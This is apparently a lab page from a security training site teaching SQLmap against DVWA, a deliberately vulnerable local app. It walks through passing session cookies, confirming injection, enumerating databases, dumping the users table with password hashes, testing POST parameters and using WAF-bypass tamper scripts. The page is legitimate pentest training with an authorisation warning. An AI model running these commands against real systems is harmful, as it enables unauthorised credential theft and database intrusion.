⚠️ Authorised Targets Only: SQLmap is a powerful automated attack tool. Use it exclusively against DVWA running on your own local machine, systems you own, or explicitly authorised assessment targets. Running SQLmap against any web application without written authorisation is illegal under computer fraud laws in most jurisdictions.
In Labs 7 and 8 you performed SQL injection manually, building queries by hand, interpreting outputs character by character. That manual approach is essential for understanding the technique. DVWA SQLMAP Lab 12 shows you what happens when you automate it. SQLmap is to SQL injection what Nmap is to port scanning — a tool that compresses hours of manual work into minutes of automated enumeration. One command tests all injection types, identifies the backend database, and begins extracting data. By the end of this lab you will have dumped the entire DVWA user table, including password hashes, using a single terminal workflow. Understanding both manual and automated approaches is what distinguishes a professional web application tester.
🎯 What You’ll Learn in Lab 12
Authenticate SQLmap to DVWA using session cookies
Run SQLmap to confirm SQL injection and identify the backend DBMS
Enumerate databases, tables, and columns automatically
Dump the complete users table including password hashes
Understand when to use SQLmap vs manual injection in professional work
In Lab 11 you extracted data using blind SQL injection — boolean and time-based queries built manually. Lab 12 automates that entire process with SQLmap. Together, Labs 7, 11, and 12 cover the complete SQL injection skill set: manual Union-based, manual blind, and automated exploitation. All three techniques appear in the DVWA Lab Series because professional testers need all three depending on the context.
Getting the Session Cookie — Authenticating SQLmap to DVWA
DVWA requires a logged-in session for all vulnerability modules. SQLmap needs to include the session cookie in every request it makes, otherwise DVWA redirects it to the login page and every test returns a 302 redirect rather than a real response. Getting the cookie takes 30 seconds in DevTools and is required before any SQLmap command will work against DVWA.
GET SESSION COOKIE FROM DVWA
# Step 1: Log into DVWA in your browser
http://localhost/dvwa/login.php
Username: admin | Password: password
# Step 2: Set Security Level to Low
DVWA Security → Low → Submit
# Step 3: Open DevTools (F12) → Application → Cookies → localhost
PHPSESSID = [your session value — 26 char hex string]
# Now run SQLmap to confirm connection and injection point
sqlmap -u “$TARGET” –cookie=”$COOKIE” -p id –batch –level=1 –risk=1
# –batch = answer all prompts with defaults (no interaction needed)
# -p id = test the ‘id’ parameter specifically
# Expected output includes:
[INFO] GET parameter ‘id’ is vulnerable
[INFO] the back-end DBMS is MySQL
✅ What you just learned: The –batch flag is essential for automated use — without it, SQLmap pauses to ask confirmation questions at multiple points. The -p id flag directs SQLmap to specifically test the ‘id’ parameter rather than scanning all parameters (faster for known vulnerable inputs). The confirmed injection and DBMS identification output is the foundation for all subsequent extraction commands — SQLmap optimises its payloads for the specific database type and injection technique it identified in this step.
📸 Screenshot the SQLmap output confirming injection and MySQL backend. Share in #dvwa-labs on Discord.
Confirming Injection and Identifying the DBMS
Once SQLmap confirms the injection point, it identifies the backend DBMS type and version. This matters for subsequent exploitation because different database systems have different system tables, privilege models, and file access mechanisms. MySQL’s information_schema database structure, LOAD_FILE() function, and INTO OUTFILE syntax are MySQL-specific. SQLmap automatically adapts its enumeration and exploitation payloads to the identified DBMS — the tester does not need to manage this differentiation manually.
securityelites.com
SQLmap Injection Confirmation Output
[INFO] testing connection to the target URL
[INFO] checking if the target is protected by some kind of WAF/IPS
[INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause’
[INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based’ injectable
[INFO] GET parameter ‘id’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
—
Parameter: id (GET)
Type: error-based
Type: UNION query
—
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0
📸 SQLmap injection confirmation — both error-based and UNION query injection techniques confirmed on the id parameter. Backend identified as MySQL on Linux. SQLmap will now use optimised MySQL-specific payloads for all subsequent enumeration.
Database Enumeration and Full Table Dump
⚡ EXERCISE 2 — DVWA TERMINAL (18 MIN)
Enumerate Databases, Tables, and Dump the Complete Users Table
✅ What you just learned: The four-step enumeration workflow — databases → tables → columns → dump — is the standard SQLmap progression for any SQL injection finding. SQLmap caches results between runs (stored in ~/.local/share/sqlmap/output/), so subsequent commands on the same target are faster. The hash cracking offer at the dump stage uses SQLmap’s internal dictionary — for professional engagements, export the hashes and use Hashcat with a full wordlist for better crack rates. The –output-dir flag saves everything in a structured format suitable for report evidence collection.
📸 Screenshot the complete users table dump showing all accounts and cracked passwords. Share in #dvwa-labs on Discord.
Medium Security — POST Parameter Testing
DVWA Medium security changes the SQL injection input from a GET parameter in the URL to a POST parameter submitted via a dropdown form. SQLmap handles POST parameters differently — instead of specifying the URL parameter with -p, you provide the POST data string with --data. The vulnerability at Medium level is the same SQL injection with an integer-based input — the security change is the delivery mechanism, not the underlying query structure.
⚡ EXERCISE 3 — DVWA TERMINAL (12 MIN)
Run SQLmap Against DVWA Medium Security — POST Parameter
⏱️ Time: 12 minutes · DVWA at Medium security
MEDIUM SECURITY — POST DATA SQLmap
# Set DVWA to Medium security
# Update your cookie to reflect medium security level
COOKIE=”PHPSESSID=YOURSESSIONID;security=medium”
# Medium security uses POST — specify with –data flag
# SQLmap tests the POST id parameter and confirms injection
# Returns same databases: dvwa, information_schema
# Alternative: capture request in Burp and save to file
sqlmap -r /tmp/sqli_request.txt –batch –dbs
# The -r flag reads a full HTTP request from a file
# Useful for complex requests with many headers/cookies
# How to save the request from Burp:
# Burp Repeater → right-click → Save item → save as .txt
# SQLmap reads all headers, cookies, method, and body from the file
✅ What you just learned: The -r (request file) method is the most efficient SQLmap workflow for complex web applications in real assessments. Rather than manually specifying every cookie, header, and POST parameter in flags, you capture the complete request from Burp Suite, save it, and pass it directly to SQLmap. This handles multi-cookie sessions, custom headers (X-Auth-Token, API keys), and complex POST bodies automatically. It also creates perfect documentation — the saved request file is evidence of the exact HTTP request used in the test, directly suitable for inclusion in the penetration test report’s evidence section.
📸 Screenshot SQLmap confirming injection on the POST parameter at Medium security. Share in #dvwa-labs on Discord. Tag #sqlmap2026
Manual vs SQLmap — When to Use Each
Professional web application testers use both manual SQL injection and SQLmap, selecting the appropriate approach based on context. Manual injection is essential for: understanding the vulnerability at a technical level (required for accurate reporting), testing blind injection where output confirmation requires interpretation, contexts where automated tool traffic would be obviously anomalous, and WAF evasion where manual payload crafting outperforms automated tamper scripts.
SQLmap is appropriate for: confirming and documenting a known injection point efficiently, bulk extraction from confirmed vulnerabilities, time-critical assessments where manual extraction of large datasets is not feasible, and generating structured output for automated report evidence. The professional standard is to understand manual exploitation thoroughly, use SQLmap for efficiency, and always be able to explain what SQLmap’s payloads are doing when asked by a client or during a debrief.
🧠 QUICK CHECK — Lab 12
You need to use SQLmap against a login form that submits credentials as a POST request with multiple cookies and a custom X-CSRF-Token header. What is the most efficient approach?
📋 SQLmap Lab Reference — Key Commands
sqlmap -u URL –cookie=”C” -p id –batch –dbsList all databases accessible through the injection
-D dvwa –tablesList tables in specific database
-D dvwa -T users –columnsList columns in specific table
-D dvwa -T users –dumpDump all rows from table + offer hash cracking
–data=”id=1&Submit=Submit”Test POST parameter instead of GET
-r request.txtRead complete HTTP request from Burp-saved file
–output-dir=/tmp/evidence/Save all results to directory for report documentation
–tamper=space2commentApply WAF evasion tamper script to payloads
🏆 Mark Lab 12 as Complete
Lab 12 completes the SQL injection series in DVWA — manual union-based (Lab 7), manual blind (Lab 11), and automated extraction (Lab 12). You can now enumerate and dump databases both manually and with SQLmap, and understand when to use each approach in professional assessments.
❓ Frequently Asked Questions
What is SQLmap and what does it do?
Open-source tool that automates SQL injection detection and exploitation. Tests all injection types (boolean blind, time-based, error-based, UNION), identifies the backend DBMS, and automates database enumeration and data extraction. Supports MySQL, PostgreSQL, MSSQL, Oracle, SQLite and more.
Does SQLmap work against DVWA with authentication?
Yes — use –cookie=’PHPSESSID=value;security=low’ to pass the session cookie. Get the PHPSESSID from DevTools → Application → Cookies after logging in. The security cookie tells DVWA which security level applies.
What is the difference between manual SQL injection and SQLmap?
Manual builds understanding — you craft every payload, interpret every response. SQLmap automates the process — tests all techniques, identifies DBMS, dumps data in minutes. Professionals use both: manual for WAF evasion and precise understanding, SQLmap for confirmed vulnerabilities and bulk extraction.
Can SQLmap bypass WAFs?
Yes — via tamper scripts: –tamper=space2comment, randomcase, charencode, between. Multiple scripts can be chained. Modern behavioural WAFs may still detect the scanning pattern regardless of payload obfuscation.
What comes after DVWA Lab 12?
Lab 13: DVWA Insecure CAPTCHA — business logic flaw where CAPTCHA verification is bypassed by manipulating the step parameter in the POST request. A completely different vulnerability class from the SQL injection labs.
← Previous Lab
Lab 11: DVWA Blind SQL Injection 2026
Next Lab →
Lab 13: DVWA Insecure CAPTCHA 2026
📚 Further Reading
DVWA Blind SQL Injection Lab 2026— Lab 11 covers the manual blind injection techniques that SQLmap automates in this lab — understanding the manual approach first makes SQLmap’s output interpretable.
DVWA SQL Injection Lab 2026— Lab 7 covers foundational manual UNION-based SQL injection — the technique SQLmap detected and used in the error-based/UNION confirmation step.
SQL Injection Complete Guide— The complete SQL injection category — all injection types, second-order SQLi, stored procedures, ORM injection, and remediation with parameterised queries across multiple languages.
SQLmap GitHub Repository— The official SQLmap source code, wiki documentation covering all flags and tamper scripts, and the community-maintained list of bypass techniques and advanced usage patterns.
SQLmap Usage Wiki— Complete SQLmap flags reference — all enumeration options, output formats, WAF bypass tamper scripts, and advanced options for complex authentication and request handling scenarios.
ME
Mr Elite
Owner, SecurityElites.com
There is a temptation when learning SQL injection to go straight to SQLmap and skip the manual techniques. I did this early in my career and it created a gap that became obvious during client debriefs. A client’s CTO asked me to explain exactly how the injection worked — what specific SQL was being executed, what output confirmed the vulnerability, why the particular parameter was injectable when adjacent parameters were not. I knew SQLmap had confirmed it. I could not explain the underlying mechanics in the detail the question deserved. I went back, worked through manual blind injection properly, and never had that problem again. SQLmap is a force multiplier. But the force it multiplies is your understanding of SQL injection. Use it after you understand what it is doing, not instead of understanding it. Labs 7 and 11 before Lab 12 — that order exists for a reason.
Leave a Reply